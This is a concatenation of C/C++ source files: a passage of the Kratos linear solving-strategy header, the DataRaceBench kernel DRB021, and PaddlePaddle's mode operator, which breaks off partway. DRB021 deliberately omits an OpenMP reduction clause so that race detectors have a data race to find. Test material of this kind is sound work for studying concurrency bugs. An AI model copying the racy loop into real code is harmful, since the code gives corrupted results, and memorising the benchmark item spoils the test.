typedef typename BaseType::LocalSystemMatrixType LocalSystemMatrixType;
typedef typename BaseType::TSystemMatrixPointerType TSystemMatrixPointerType;
typedef typename BaseType::TSystemVectorPointerType TSystemVectorPointerType;
///@}
///@name Life Cycle
///@{
/**
* Default constructor
* @param rModelPart The model part of the problem
* @param pScheme The integration scheme
* @param pNewLinearSolver The linear solver employed
* @param CalculateReactionFlag The flag for the reaction calculation
* @param ReformDofSetAtEachStep The flag that allows recomputing the DOF set at each step
* @param CalculateNormDxFlag The flag that sets whether the norm of Dx is computed
* @param MoveMeshFlag The flag that allows moving the mesh
*/
ResidualBasedLinearStrategy(
ModelPart& rModelPart,
typename TSchemeType::Pointer pScheme,
typename TLinearSolver::Pointer pNewLinearSolver,
bool CalculateReactionFlag = false,
bool ReformDofSetAtEachStep = false,
bool CalculateNormDxFlag = false,
bool MoveMeshFlag = false
)
: SolvingStrategy<TSparseSpace, TDenseSpace, TLinearSolver>(rModelPart, MoveMeshFlag)
{
KRATOS_TRY
mCalculateReactionsFlag = CalculateReactionFlag;
mReformDofSetAtEachStep = ReformDofSetAtEachStep;
mCalculateNormDxFlag = CalculateNormDxFlag;
// Saving the scheme
mpScheme = pScheme;
// Saving the linear solver
mpLinearSolver = pNewLinearSolver;
// Setting up the default builder and solver
mpBuilderAndSolver = typename TBuilderAndSolverType::Pointer
(
new ResidualBasedBlockBuilderAndSolver<TSparseSpace, TDenseSpace, TLinearSolver > (mpLinearSolver)
);
// Set flag to start the calculations correctly
mSolutionStepIsInitialized = false;
mInitializeWasPerformed = false;
// Tells the builder and solver whether the reactions have to be calculated
GetBuilderAndSolver()->SetCalculateReactionsFlag(mCalculateReactionsFlag);
// Tells the builder and solver whether the system matrix and vectors need
// to be reshaped at each step
GetBuilderAndSolver()->SetReshapeMatrixFlag(mReformDofSetAtEachStep);
// Set EchoLevel to the default value (only time is displayed)
this->SetEchoLevel(1);
// By default the matrices are rebuilt at each solution step
BaseType::SetRebuildLevel(1);
KRATOS_CATCH("")
}
/**
* Constructor specifying the builder and solver
* @param rModelPart The model part of the problem
* @param pScheme The integration scheme
* @param pNewLinearSolver The linear solver employed
* @param pNewBuilderAndSolver The builder and solver employed
* @param CalculateReactionFlag The flag for the reaction calculation
* @param ReformDofSetAtEachStep The flag that allows recomputing the DOF set at each step
* @param CalculateNormDxFlag The flag that sets whether the norm of Dx is computed
* @param MoveMeshFlag The flag that allows moving the mesh
*/
ResidualBasedLinearStrategy(
ModelPart& rModelPart,
typename TSchemeType::Pointer pScheme,
typename TLinearSolver::Pointer pNewLinearSolver,
typename TBuilderAndSolverType::Pointer pNewBuilderAndSolver,
bool CalculateReactionFlag = false,
bool ReformDofSetAtEachStep = false,
bool CalculateNormDxFlag = false,
bool MoveMeshFlag = false
)
: SolvingStrategy<TSparseSpace, TDenseSpace, TLinearSolver>(rModelPart, MoveMeshFlag)
{
KRATOS_TRY
mCalculateReactionsFlag = CalculateReactionFlag;
mReformDofSetAtEachStep = ReformDofSetAtEachStep;
mCalculateNormDxFlag = CalculateNormDxFlag;
// Saving the scheme
mpScheme = pScheme;
// Saving the linear solver
mpLinearSolver = pNewLinearSolver;
// Setting up the builder and solver
mpBuilderAndSolver = pNewBuilderAndSolver;
// Set flag to start the calculations correctly
mSolutionStepIsInitialized = false;
mInitializeWasPerformed = false;
// Tells the builder and solver whether the reactions have to be calculated
GetBuilderAndSolver()->SetCalculateReactionsFlag(mCalculateReactionsFlag);
// Tells the builder and solver whether the system matrix and vectors need
// to be reshaped at each step
GetBuilderAndSolver()->SetReshapeMatrixFlag(mReformDofSetAtEachStep);
// Set EchoLevel to the default value (only time is displayed)
this->SetEchoLevel(1);
// By default the matrices are rebuilt at each solution step
BaseType::SetRebuildLevel(1);
KRATOS_CATCH("")
}
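/**
* Illustrative usage only (a sketch; the concrete space, scheme and solver
* types below are assumptions supplied by the caller's configuration, not
* defined in this header):
*
* ResidualBasedLinearStrategy<SparseSpaceType, LocalSpaceType, LinearSolverType>
* strategy(model_part, p_scheme, p_linear_solver);
* strategy.Solve(); // builds the system once and solves it linearly
*/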
/**
* @brief Destructor.
* @details In trilinos third party library, the linear solver's preconditioner should be freed before the system matrix. We control the deallocation order with Clear().
*/
~ResidualBasedLinearStrategy() override
{
// If the linear solver has not been deallocated, clean it before
// deallocating mpA. This prevents a memory error with the ML
// solver (which holds a reference to it).
auto p_linear_solver = GetBuilderAndSolver()->GetLinearSystemSolver();
if (p_linear_solver != nullptr) p_linear_solver->Clear();
// Deallocating system vectors to avoid errors in MPI. Clear calls
// TrilinosSpace::Clear for the vectors, which preserves the Map of
// current vectors, performing MPI calls in the process. Due to the
// way Python garbage collection works, this may happen after
// MPI_Finalize has already been called and is an error. Resetting
// the pointers here prevents Clear from operating with the
// (now deallocated) vectors.
mpA.reset();
mpDx.reset();
mpb.reset();
this->Clear();
}
/**
* @brief Set method for the time scheme
* @param pScheme The pointer to the time scheme considered
*/
void SetScheme(typename TSchemeType::Pointer pScheme)
{
mpScheme = pScheme;
};
/**
* @brief Get method for the time scheme
* @return mpScheme: The pointer to the time scheme considered
*/
typename TSchemeType::Pointer GetScheme()
{
return mpScheme;
};
/**
* @brief Set method for the builder and solver
* @param pNewBuilderAndSolver The pointer to the builder and solver considered
*/
void SetBuilderAndSolver(typename TBuilderAndSolverType::Pointer pNewBuilderAndSolver)
{
mpBuilderAndSolver = pNewBuilderAndSolver;
};
/**
* @brief Get method for the builder and solver
* @return mpBuilderAndSolver: The pointer to the builder and solver considered
*/
typename TBuilderAndSolverType::Pointer GetBuilderAndSolver()
{
return mpBuilderAndSolver;
};
/**
* @brief This method sets the flag mCalculateReactionsFlag
* @param CalculateReactionsFlag The flag that tells if the reactions are computed
*/
void SetCalculateReactionsFlag(bool CalculateReactionsFlag)
{
mCalculateReactionsFlag = CalculateReactionsFlag;
GetBuilderAndSolver()->SetCalculateReactionsFlag(mCalculateReactionsFlag);
}
/**
* @brief This method returns the flag mCalculateReactionsFlag
* @return The flag that tells if the reactions are computed
*/
bool GetCalculateReactionsFlag()
{
return mCalculateReactionsFlag;
}
/**
* @brief This method sets the flag mReformDofSetAtEachStep
* @param Flag The flag that tells if each time step the system is rebuilt
*/
void SetReformDofSetAtEachStepFlag(bool Flag)
{
mReformDofSetAtEachStep = Flag;
GetBuilderAndSolver()->SetReshapeMatrixFlag(mReformDofSetAtEachStep);
}
/**
* @brief This method returns the flag mReformDofSetAtEachStep
* @return The flag that tells if each time step the system is rebuilt
*/
bool GetReformDofSetAtEachStepFlag()
{
return mReformDofSetAtEachStep;
}
/**
* @brief It sets the level of echo for the solving strategy
* @param Level The level to set
* @details The different levels of echo are:
* - 0: Mute... no echo at all
* - 1: Printing time and basic information
* - 2: Printing linear solver data
* - 3: Printing debug information: echo of stiffness matrix, Dx, b...
*/
void SetEchoLevel(int Level) override
{
BaseType::SetEchoLevel(Level);
GetBuilderAndSolver()->SetEchoLevel(Level);
}
//*********************************************************************************
/**OPERATIONS ACCESSIBLE FROM THE INPUT:*/
/**
* @brief Operation to predict the solution... if it is not called, a trivial predictor is used in which the
values of the solution step of interest are assumed equal to the old values
*/
void Predict() override
{
KRATOS_TRY
const DataCommunicator &r_comm = BaseType::GetModelPart().GetCommunicator().GetDataCommunicator();
//OPERATIONS THAT SHOULD BE DONE ONCE - internal check to avoid repetitions
//if the operations needed were already performed this does nothing
if(mInitializeWasPerformed == false)
Initialize();
//initialize solution step
if (mSolutionStepIsInitialized == false)
InitializeSolutionStep();
TSystemMatrixType& rA = *mpA;
TSystemVectorType& rDx = *mpDx;
TSystemVectorType& rb = *mpb;
DofsArrayType& r_dof_set = GetBuilderAndSolver()->GetDofSet();
this->GetScheme()->Predict(BaseType::GetModelPart(), r_dof_set, rA, rDx, rb);
auto& r_constraints_array = BaseType::GetModelPart().MasterSlaveConstraints();
const int local_number_of_constraints = r_constraints_array.size();
const int global_number_of_constraints = r_comm.SumAll(local_number_of_constraints);
if(global_number_of_constraints != 0) {
const auto& rProcessInfo = BaseType::GetModelPart().GetProcessInfo();
auto it_begin = BaseType::GetModelPart().MasterSlaveConstraints().begin();
#pragma omp parallel for firstprivate(it_begin)
for(int i=0; i<static_cast<int>(local_number_of_constraints); ++i)
(it_begin+i)->ResetSlaveDofs(rProcessInfo);
#pragma omp parallel for firstprivate(it_begin)
for(int i=0; i<static_cast<int>(local_number_of_constraints); ++i)
(it_begin+i)->Apply(rProcessInfo);
//the following is needed since we need to eventually compute time derivatives after applying
//Master slave relations
TSparseSpace::SetToZero(rDx);
this->GetScheme()->Update(BaseType::GetModelPart(), r_dof_set, rA, rDx, rb);
}
if (BaseType::MoveMeshFlag() == true) BaseType::MoveMesh();
KRATOS_CATCH("")
}
/**
* @brief Initialization of member variables and prior operations
*/
void Initialize() override
{
KRATOS_TRY
if (mInitializeWasPerformed == false)
{
//pointers needed in the solution
typename TSchemeType::Pointer p_scheme = GetScheme();
//Initialize The Scheme - OPERATIONS TO BE DONE ONCE
if (p_scheme->SchemeIsInitialized() == false)
p_scheme->Initialize(BaseType::GetModelPart());
//Initialize The Elements - OPERATIONS TO BE DONE ONCE
if (p_scheme->ElementsAreInitialized() == false)
p_scheme->InitializeElements(BaseType::GetModelPart());
//Initialize The Conditions - OPERATIONS TO BE DONE ONCE
if (p_scheme->ConditionsAreInitialized() == false)
p_scheme->InitializeConditions(BaseType::GetModelPart());
mInitializeWasPerformed = true;
}
KRATOS_CATCH("")
}
/**
* @brief The problem of interest is solved
* @details a double containing norm(Dx) is returned if CalculateNormDxFlag == true, else 0 is returned
* @return norm(Dx)
*/
double Solve() override
{
BaseType::Solve();
//calculate if needed the norm of Dx
double norm_dx = 0.00;
if (mCalculateNormDxFlag == true)
norm_dx = TSparseSpace::TwoNorm(*mpDx);
return norm_dx;
}
/**
* @brief Clears the internal storage
* @note NULL could be changed to nullptr in the future (c++11)
*/
void Clear() override
{
KRATOS_TRY;
// If the preconditioner is saved between solves, it
// should be cleared here.
GetBuilderAndSolver()->GetLinearSystemSolver()->Clear();
if (mpA != NULL)
SparseSpaceType::Clear(mpA);
if (mpDx != NULL)
SparseSpaceType::Clear(mpDx);
if (mpb != NULL)
SparseSpaceType::Clear(mpb);
// Setting to zero the internal flag to ensure that the dof sets are recalculated
GetBuilderAndSolver()->SetDofSetIsInitializedFlag(false);
GetBuilderAndSolver()->Clear();
GetScheme()->Clear();
mInitializeWasPerformed = false;
mSolutionStepIsInitialized = false;
KRATOS_CATCH("");
}
/**
* @brief This operation should be called before printing the results when non-trivial results (e.g. stresses)
need to be calculated given the solution of the step
* @details This operation should be called only when needed, before printing, as it can involve a non-negligible cost
*/
void CalculateOutputData() override
{
TSystemMatrixType& rA = *mpA;
TSystemVectorType& rDx = *mpDx;
TSystemVectorType& rb = *mpb;
GetScheme()->CalculateOutputData(BaseType::GetModelPart(),
GetBuilderAndSolver()->GetDofSet(),
rA, rDx, rb);
}
/**
* @brief Performs all the required operations that should be done (for each step) before solving the solution step.
* @details A member variable should be used as a flag to make sure this function is called only once per step.
* @todo Boost dependencies should be replaced by std equivalent
*/
void InitializeSolutionStep() override
{
KRATOS_TRY
if (mSolutionStepIsInitialized == false)
{
//pointers needed in the solution
typename TSchemeType::Pointer p_scheme = GetScheme();
typename TBuilderAndSolverType::Pointer p_builder_and_solver = GetBuilderAndSolver();
const int rank = BaseType::GetModelPart().GetCommunicator().MyPID();
//set up the system, operation performed just once unless it is required
//to reform the dof set at each iteration
BuiltinTimer system_construction_time;
if (p_builder_and_solver->GetDofSetIsInitializedFlag() == false ||
mReformDofSetAtEachStep == true)
{
//setting up the list of the DOFs to be solved
BuiltinTimer setup_dofs_time;
p_builder_and_solver->SetUpDofSet(p_scheme, BaseType::GetModelPart());
KRATOS_INFO_IF("Setup Dofs Time", BaseType::GetEchoLevel() > 0 && rank == 0)
<< setup_dofs_time.ElapsedSeconds() << std::endl;
//shaping correctly the system
BuiltinTimer setup_system_time;
p_builder_and_solver->SetUpSystem(BaseType::GetModelPart());
KRATOS_INFO_IF("Setup System Time", BaseType::GetEchoLevel() > 0 && rank == 0)
<< setup_system_time.ElapsedSeconds() << std::endl;
//setting up the Vectors involved to the correct size
BuiltinTimer system_matrix_resize_time;
p_builder_and_solver->ResizeAndInitializeVectors(p_scheme, mpA, mpDx, mpb,
BaseType::GetModelPart());
KRATOS_INFO_IF("System Matrix Resize Time", BaseType::GetEchoLevel() > 0 && rank == 0)
<< system_matrix_resize_time.ElapsedSeconds() << std::endl;
}
KRATOS_INFO_IF("System Construction Time", BaseType::GetEchoLevel() > 0 && rank == 0)
<< system_construction_time.ElapsedSeconds() << std::endl;
TSystemMatrixType& rA = *mpA;
TSystemVectorType& rDx = *mpDx;
TSystemVectorType& rb = *mpb;
//initial operations ... things that are constant over the Solution Step
p_builder_and_solver->InitializeSolutionStep(BaseType::GetModelPart(), rA, rDx, rb);
//initial operations ... things that are constant over the Solution Step
p_scheme->InitializeSolutionStep(BaseType::GetModelPart(), rA, rDx, rb);
mSolutionStepIsInitialized = true;
}
KRATOS_CATCH("")
}
/**
* @brief Performs all the required operations that should be done (for each step) after solving the solution step.
* @details A member variable should be used as a flag to make sure this function is called only once per step.
*/
void FinalizeSolutionStep() override
{
KRATOS_TRY;
typename TSchemeType::Pointer p_scheme = GetScheme();
typename TBuilderAndSolverType::Pointer p_builder_and_solver = GetBuilderAndSolver();
TSystemMatrixType &rA = *mpA;
TSystemVectorType &rDx = *mpDx;
TSystemVectorType &rb = *mpb;
//Finalisation of the solution step,
//operations to be done after achieving convergence, for example the
//Final Residual Vector (mb) has to be saved in there
//to avoid error accumulation
p_scheme->FinalizeSolutionStep(BaseType::GetModelPart(), rA, rDx, rb);
p_builder_and_solver->FinalizeSolutionStep(BaseType::GetModelPart(), rA, rDx, rb);
//Cleaning memory after the solution
p_scheme->Clean();
//reset flags for next step
mSolutionStepIsInitialized = false;
//deallocate the systemvectors if needed
if (mReformDofSetAtEachStep == true)
{
SparseSpaceType::Clear(mpA);
SparseSpaceType::Clear(mpDx);
SparseSpaceType::Clear(mpb);
this->Clear();
}
KRATOS_CATCH("");
}
/**
* @brief Solves the current step. This function returns true if a solution has been found, false otherwise.
*/
bool SolveSolutionStep() override
{
//pointers needed in the solution
typename TSchemeType::Pointer p_scheme = GetScheme();
typename TBuilderAndSolverType::Pointer p_builder_and_solver = GetBuilderAndSolver();
TSystemMatrixType& rA = *mpA;
TSystemVectorType& rDx = *mpDx;
TSystemVectorType& rb = *mpb;
p_scheme->InitializeNonLinIteration(BaseType::GetModelPart(), rA, rDx, rb);
if (BaseType::mRebuildLevel > 0 || BaseType::mStiffnessMatrixIsBuilt == false)
{
TSparseSpace::SetToZero(rA);
TSparseSpace::SetToZero(rDx);
TSparseSpace::SetToZero(rb);
// passing smart pointers instead of references here
// to prevent dangling pointer to system matrix when
// reusing ml preconditioners in the trilinos tpl
p_builder_and_solver->BuildAndSolve(p_scheme, BaseType::GetModelPart(), rA, rDx, rb);
BaseType::mStiffnessMatrixIsBuilt = true;
}
else
{
TSparseSpace::SetToZero(rDx);
TSparseSpace::SetToZero(rb);
p_builder_and_solver->BuildRHSAndSolve(p_scheme, BaseType::GetModelPart(), rA, rDx, rb);
}
// Debugging info
EchoInfo();
//update results
DofsArrayType& r_dof_set = p_builder_and_solver->GetDofSet();
p_scheme->Update(BaseType::GetModelPart(), r_dof_set, rA, rDx, rb);
//move the mesh if needed
if (BaseType::MoveMeshFlag() == true) BaseType::MoveMesh();
p_scheme->FinalizeNonLinIteration(BaseType::GetModelPart(), rA, rDx, rb);
// Calculate reactions if required
if (mCalculateReactionsFlag == true)
p_builder_and_solver->CalculateReactions(p_scheme,
BaseType::GetModelPart(),
rA, rDx, rb);
return true;
}
/**
* @brief This method returns the LHS matrix
* @return The LHS matrix
*/
TSystemMatrixType& GetSystemMatrix()
{
TSystemMatrixType& mA = *mpA;
return mA;
}
/**
* @brief This method returns the RHS vector
* @return The RHS vector
*/
TSystemVectorType& GetSystemVector()
{
TSystemVectorType& mb = *mpb;
return mb;
}
/**
* @brief This method returns the solution vector
* @return The Dx vector
*/
TSystemVectorType& GetSolutionVector()
{
TSystemVectorType& mDx = *mpDx;
return mDx;
}
/**
* @brief This method returns the residual norm
* @return The residual norm
*/
double GetResidualNorm() override
{
if (TSparseSpace::Size(*mpb) != 0)
return TSparseSpace::TwoNorm(*mpb);
else
return 0.0;
}
/**
* @brief Function to perform expensive checks.
* @details It is designed to be called ONCE to verify that the input is correct.
*/
int Check() override
{
KRATOS_TRY
BaseType::Check();
GetBuilderAndSolver()->Check(BaseType::GetModelPart());
GetScheme()->Check(BaseType::GetModelPart());
return 0;
KRATOS_CATCH("")
}
///@}
///@name Operators
///@{
///@}
///@name Operations
///@{
///@}
///@name Access
///@{
///@}
///@name Inquiry
///@{
///@}
///@name Input and output
///@{
/// Turn back information as a string.
std::string Info() const override
{
return "ResidualBasedLinearStrategy";
}
/// Print information about this object.
void PrintInfo(std::ostream& rOStream) const override
{
rOStream << Info();
}
/// Print object's data.
void PrintData(std::ostream& rOStream) const override
{
rOStream << Info();
}
///@}
///@name Friends
///@{
///@}
protected:
///@name Protected static Member Variables
///@{
///@}
///@name Protected member Variables
///@{
///@}
///@name Protected Operators
///@{
///@}
///@name Protected Operations
///@{
///@}
///@name Protected Access
///@{
///@}
///@name Protected Inquiry
///@{
///@}
///@name Protected LifeCycle
///@{
///@}
private:
///@name Static Member Variables
///@{
///@}
///@name Member Variables
///@{
typename TLinearSolver::Pointer mpLinearSolver; /// The pointer to the linear solver considered
typename TSchemeType::Pointer mpScheme; /// The pointer to the time scheme employed
typename TBuilderAndSolverType::Pointer mpBuilderAndSolver; /// The pointer to the builder and solver employed
TSystemVectorPointerType mpDx; /// The increment in the solution
TSystemVectorPointerType mpb; /// The RHS vector of the system of equations
TSystemMatrixPointerType mpA; /// The LHS matrix of the system of equations
/**
* @brief Flag telling if it is needed to reform the DofSet at each
solution step or if it is possible to form it just once
* @details Default = false
- true : Reform at each time step
- false : Form it just once (more efficient)
*/
bool mReformDofSetAtEachStep;
bool mCalculateNormDxFlag; /// Calculates if required the norm of the correction term Dx
/**
* @brief Flag telling if it is needed or not to compute the reactions
* @details Default = false
*/
bool mCalculateReactionsFlag;
bool mSolutionStepIsInitialized; /// Flag to set as initialized the solution step
bool mInitializeWasPerformed; /// Flag to set as initialized the strategy
///@}
///@name Private Operators*/
///@{
/**
* @brief This method returns the components of the system of equations depending of the echo level
*/
virtual void EchoInfo()
{
TSystemMatrixType& rA = *mpA;
TSystemVectorType& rDx = *mpDx;
TSystemVectorType& rb = *mpb;
if (BaseType::GetEchoLevel() == 3) //if it is needed to print the debug info
{
KRATOS_INFO("LHS") << "SystemMatrix = " << rA << std::endl;
KRATOS_INFO("Dx") << "Solution obtained = " << rDx << std::endl;
KRATOS_INFO("RHS") << "RHS = " << rb << std::endl;
}
if (this->GetEchoLevel() == 4) //print to matrix market file
{
std::stringstream matrix_market_name;
matrix_market_name << "A_" << BaseType::GetModelPart().GetProcessInfo()[TIME] << ".mm";
TSparseSpace::WriteMatrixMarketMatrix((char*) (matrix_market_name.str()).c_str(), rA, false);
std::stringstream matrix_market_vectname;
matrix_market_vectname << "b_" << BaseType::GetModelPart().GetProcessInfo()[TIME] << ".mm.rhs";
TSparseSpace::WriteMatrixMarketVector((char*) (matrix_market_vectname.str()).c_str(), rb);
}
}
///@}
///@name Private Operations*/
///@{
///@}
///@name Private Access */
///@{
///@}
///@name Private Inquiry */
///@{
///@}
///@name Un accessible methods */
///@{
/** Copy constructor.
*/
ResidualBasedLinearStrategy(const ResidualBasedLinearStrategy& Other);
///@}
}; /* Class ResidualBasedLinearStrategy */
///@}
///@name Type Definitions */
///@{
///@}
} /* namespace Kratos.*/
#endif /* KRATOS_RESIDUALBASED_LINEAR_STRATEGY defined */
|
DRB021-reductionmissing-orig-yes.c | /*
Copyright (c) 2017, Lawrence Livermore National Security, LLC.
Produced at the Lawrence Livermore National Laboratory
Written by Chunhua Liao, Pei-Hung Lin, Joshua Asplund,
Markus Schordan, and Ian Karlin
(email: liao6@llnl.gov, lin32@llnl.gov, asplund1@llnl.gov,
schordan1@llnl.gov, karlin1@llnl.gov)
LLNL-CODE-732144
All rights reserved.
This file is part of DataRaceBench. For details, see
https://github.com/LLNL/dataracebench. Please also see the LICENSE file
for our additional BSD notice.
Redistribution and use in source and binary forms, with
or without modification, are permitted provided that the following
conditions are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the disclaimer below.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the disclaimer (as noted below)
in the documentation and/or other materials provided with the
distribution.
* Neither the name of the LLNS/LLNL nor the names of its contributors
may be used to endorse or promote products derived from this
software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL LAWRENCE LIVERMORE NATIONAL
SECURITY, LLC, THE U.S. DEPARTMENT OF ENERGY OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
THE POSSIBILITY OF SUCH DAMAGE.
*/
/*
A kernel with a two-level parallelizable loop with reduction:
if reduction(+:sum) is missing, there is a race condition.
Data race pairs: we allow multiple pairs to preserve the pattern.
sum@70:7 vs. sum@70:7
sum@70:7 vs. sum@70:13
*/
#include <stdio.h>
int main(int argc, char* argv[])
{
int i,j;
float temp, sum=0.0;
int len=100;
float u[100][100];
for (i = 0; i < len; i++)
for (j = 0; j < len; j++)
u[i][j] = 0.5;
#pragma omp parallel for private (temp,i,j) schedule(dynamic)
for (i = 0; i < len; i++)
for (j = 0; j < len; j++)
{
temp = u[i][j];
sum = sum + temp * temp;
}
printf ("sum = %f\n", sum);
return 0;
}
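/* Hedged reference, not part of the benchmark kernel above: the race-free
   variant of the loop would carry sum as a reduction, e.g.
     #pragma omp parallel for private(temp,i,j) reduction(+:sum) schedule(dynamic)
   DRB021 deliberately omits the clause so the unsynchronized updates to sum
   stay observable to race detectors. */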
|
mode_op.h | /* Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License. */
#pragma once
#include <algorithm>
#include <iostream>
#include <utility>
#include <vector>
#include "paddle/fluid/framework/eigen.h"
#include "paddle/fluid/framework/op_registry.h"
#include "paddle/fluid/operators/transpose_op.h"
namespace paddle {
namespace operators {
template <typename T, typename Type>
static void getMode(Type input_height, Type input_width, int input_dim,
const framework::Tensor* input, T* t_out, Type* t_indices) {
#ifdef PADDLE_WITH_MKLML
#pragma omp parallel for
#endif
for (Type i = 0; i < input_height; ++i) {
std::vector<std::pair<T, Type>> col_vec;
col_vec.reserve(input_width);
if (input_dim == 1) {
auto e_input = framework::EigenVector<T>::Flatten(*input);
for (Type j = 0; j < input_width; ++j) {
col_vec.emplace_back(std::pair<T, Type>(e_input(j), j));
}
} else {
auto e_input = framework::EigenMatrix<T>::Reshape(*input, input_dim - 1);
for (Type j = 0; j < input_width; ++j) {
col_vec.emplace_back(std::pair<T, Type>(e_input(i, j), j));
}
}
std::sort(col_vec.begin(), col_vec.end(),
[](const std::pair<T, Type>& l, const std::pair<T, Type>& r) {
return (!std::isnan(static_cast<double>(l.first)) &&
std::isnan(static_cast<double>(r.first))) ||
(l.first < r.first);
});
T mode = 0;
int64_t indice = 0;
int64_t cur_freq = 0;
int64_t max_freq = 0;
for (int64_t i = 0; i < input_width; ++i) {
++cur_freq;
if (i == input_width - 1 || (col_vec[i + 1].first != col_vec[i].first)) {
if (cur_freq > max_freq) {
max_freq = cur_freq;
mode = col_vec[i].first;
indice = col_vec[i].second;
}
cur_freq = 0;
}
}
t_out[i] = mode;
t_indices[i] = indice;
}
}
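// Hedged standalone sketch (not used by the kernels below) of the sorted-run
// frequency scan that getMode performs per row: sorting makes equal values
// adjacent, so the most frequent value falls out of one linear pass.
// Relies only on <algorithm> and <vector>, both included above.
template <typename T>
static T ModeOfExample(std::vector<T> v) {
  if (v.empty()) return T(0);          // no mode of an empty sequence
  std::sort(v.begin(), v.end());       // equal values become adjacent runs
  T mode = v[0];
  int64_t cur_freq = 0, max_freq = 0;
  for (size_t i = 0; i < v.size(); ++i) {
    ++cur_freq;
    if (i + 1 == v.size() || v[i + 1] != v[i]) {  // end of a run
      if (cur_freq > max_freq) {
        max_freq = cur_freq;
        mode = v[i];
      }
      cur_freq = 0;
    }
  }
  return mode;
}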
template <typename T, typename Type>
static void ModeAssign(const Type& input_height, const Type& input_width,
const int& input_dim, const framework::Tensor* input,
const framework::Tensor* indices, T* output_data) {
#ifdef PADDLE_WITH_MKLML
#pragma omp parallel for
#endif
for (Type i = 0; i < input_height; ++i) {
if (input_dim == 1) {
auto e_input = framework::EigenVector<T>::Flatten(*input);
auto e_indices = framework::EigenVector<Type>::Flatten(*indices);
output_data[i * input_width + e_indices(0)] = e_input(0);
} else {
auto e_input = framework::EigenMatrix<T>::Reshape(*input, input_dim - 1);
auto e_indices =
framework::EigenMatrix<Type>::Reshape(*indices, input_dim - 1);
output_data[i * input_width + e_indices(i, 0)] = e_input(i, 0);
}
}
}
template <typename DeviceContext, typename T>
class ModeCPUKernel : public framework::OpKernel<T> {
public:
void Compute(const framework::ExecutionContext& context) const override {
auto* input = context.Input<framework::Tensor>("X");
auto* output = context.Output<framework::Tensor>("Out");
auto* indices = context.Output<framework::Tensor>("Indices");
const auto& in_dims = input->dims();
bool keepdim = static_cast<bool>(context.Attr<bool>("keepdim"));
// axis < 0, calculate the real axis
int axis = static_cast<int>(context.Attr<int>("axis"));
if (axis < 0) axis += in_dims.size();
T* output_data = output->mutable_data<T>(context.GetPlace());
int64_t* indices_data = indices->mutable_data<int64_t>(context.GetPlace());
auto out_dims = output->dims();
// if axis is not the last dim, transpose it to the last dim, do the
// calculation, then transpose it back to the original axis.
if (axis == in_dims.size() - 1) {
const int64_t& input_height = framework::product(
framework::slice_ddim(in_dims, 0, in_dims.size() - 1));
const int64_t& input_width = in_dims[in_dims.size() - 1];
getMode<T, int64_t>(input_height, input_width, in_dims.size(), input,
output_data, indices_data);
} else {
std::vector<int> trans_axis;
for (int i = 0; i < axis; i++) {
trans_axis.emplace_back(i);
}
trans_axis.push_back(in_dims.size() - 1);
for (int i = axis + 1; i < in_dims.size() - 1; i++) {
trans_axis.emplace_back(i);
}
trans_axis.emplace_back(axis);
if (!keepdim) {
std::vector<int> tmp_out_shape;
for (int i = 0; i < axis; i++) {
tmp_out_shape.emplace_back(in_dims[i]);
}
tmp_out_shape.emplace_back(1);
for (int i = axis + 1; i < in_dims.size(); i++) {
tmp_out_shape.emplace_back(in_dims[i]);
}
framework::DDim tmp_out_dim = framework::make_ddim(tmp_out_shape);
output->Resize(tmp_out_dim);
indices->Resize(tmp_out_dim);
}
// get the trans input_dims, out_dims
framework::DDim trans_shape(in_dims);
framework::DDim trans_out_shape(in_dims);
for (size_t i = 0; i < trans_axis.size(); i++) {
trans_shape[i] = in_dims[trans_axis[i]];
trans_out_shape[i] = in_dims[trans_axis[i]];
}
trans_out_shape[in_dims.size() - 1] = 1;
framework::Tensor trans_input;
trans_input.mutable_data<T>(trans_shape, context.GetPlace());
int ndims = trans_axis.size();
auto& dev_context =
context.template device_context<platform::CPUDeviceContext>();
// transpose the input value
TransCompute<platform::CPUDeviceContext, T>(ndims, dev_context, *input,
&trans_input, trans_axis);
const int64_t input_height = framework::product(
framework::slice_ddim(trans_shape, 0, trans_shape.size() - 1));
const int64_t input_width = trans_shape[trans_shape.size() - 1];
framework::Tensor tmp_out;
T* t_out = tmp_out.mutable_data<T>(trans_out_shape, context.GetPlace());
framework::Tensor tmp_indices;
auto* t_ind = tmp_indices.mutable_data<int64_t>(trans_out_shape,
context.GetPlace());
getMode<T, int64_t>(input_height, input_width, in_dims.size(),
&trans_input, t_out, t_ind);
// transpose back
TransCompute<platform::CPUDeviceContext, int64_t>(
ndims, dev_context, tmp_indices, indices, trans_axis);
TransCompute<platform::CPUDeviceContext, T>(ndims, dev_context, tmp_out,
output, trans_axis);
if (!keepdim) {
output->Resize(out_dims);
indices->Resize(out_dims);
}
}
}
};
template <typename DeviceContext, typename T>
class ModeGradCPUKernel : public framework::OpKernel<T> {
public:
void Compute(const framework::ExecutionContext& context) const override {
auto* x = context.Input<framework::Tensor>("X");
auto* out_grad =
context.Input<framework::Tensor>(framework::GradVarName("Out"));
auto* indices = context.Input<framework::Tensor>("Indices");
auto* x_grad =
context.Output<framework::Tensor>(framework::GradVarName("X"));
int axis = static_cast<int>(context.Attr<int>("axis"));
bool keepdim = static_cast<bool>(context.Attr<bool>("keepdim"));
